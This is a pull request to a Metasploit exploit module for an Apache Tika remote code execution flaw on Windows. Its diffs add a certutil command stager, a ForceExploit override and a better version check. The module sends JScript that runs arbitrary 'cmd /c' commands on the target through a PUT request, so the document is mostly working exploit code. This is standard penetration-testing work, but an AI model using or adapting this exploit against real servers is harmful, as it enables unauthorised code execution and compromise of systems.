### PR TITLE
Tika module updates, check and CmdStager

### DIFF
--- a/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
+++ b/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Powershell
 
@@ -27,7 +28,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          ['Automatic', {'Arch' => [ARCH_X86, ARCH_X64]}]
+          ['Windows',
+            {'Arch' => [ARCH_X86, ARCH_X64],
+            'Platform' => 'win',
+            'CmdStagerFlavor' => ['certutil']
+            }
+          ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Apr 25 2018',
@@ -49,6 +55,11 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(9998),
         OptString.new('TARGETURI', [true, 'The base path to the web application', '/'])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [true, 'Override check result', false])
       ])
   end
 
@@ -74,11 +85,10 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe
   end
 
-  def exploit
-    pay = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
-    pay = pay.gsub(/"/, '\"') # RIP use_single_quote=true
+  def execute_command(cmd, opts = {})
+    cmd.gsub(/"/, '\"')
     jscript="var oShell = WScript.CreateObject('WScript.Shell');\n"
-    jscript << "var oExec = oShell.Exec(\"cmd /c #{pay}\");"
+    jscript << "var oExec = oShell.Exec(\"cmd /c #{cmd}\");"
 
     print_status("Sending PUT request to #{peer}#{normalize_uri(target_uri, 'meta')}")
     res = send_request_cgi({
@@ -92,12 +102,20 @@ class MetasploitModule < Msf::Exploit::Remote
                 "Connection"              => "close"},
              'data' => jscript
            })
-    unless res
-      print_error('No server response, check configuration')
+
+    fail_with(Failure::Disconnected, 'No server response') unless res
+    unless (res.code == 200 && res.body.include?('tika'))
+      fail_with(Failure::UnexpectedReply, 'Invalid response received, target may not be vulnerable')
+    end
+  end
+
+  def exploit
+    checkcode = check
+    unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
+      print_error("#{checkcode[1]}. Set ForceExploit to override.")
       return
     end
-    unless (res.code == 200 && res.body.include?('tika'))
-      print_error('Invalid response received, target may not be vulnerable')
-    end
+
+    execute_cmdstager(linemax: 8000)
   end
 end

--- a/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
+++ b/modules/exploits/windows/http/apache_tika_jp2_jscript.rb
@@ -56,11 +56,15 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
              'uri'    => normalize_uri(target_uri),
            })
-    unless res || res.code != 200
+    if res.nil?
+      vprint_error('No server response, check configuration')
+      return CheckCode::Safe
+    elsif res.code != 200
       vprint_error('No server response, check configuration')
       return CheckCode::Safe
     end
-    if res.body =~ /Apache Tika (\d.[\d]+) Server/
+
+    if res.body =~ /Apache Tika (\d.[\d]+)/
       version = Gem::Version.new($1)
       vprint_status("Apache Tika Version Detected: #{version}")
       if version.between?(Gem::Version.new('1.7'), Gem::Version.new('1.17'))


### PR DESCRIPTION
Updates:

- [ ] Fix check when host/port not available
- [ ] Adjust version check to work with both possible returned pages from Tika
- [ ] Use CmdStager mixin
- [ ] Add ForceExploit option

## Verification

- [ ]  `./msfconsole -q`
- [ ] `use exploits/windows/http/apache_tika_jp2_jscript`
- [ ] `set rhosts <rhost>`
- [ ] `check`
- [ ] `exploit`

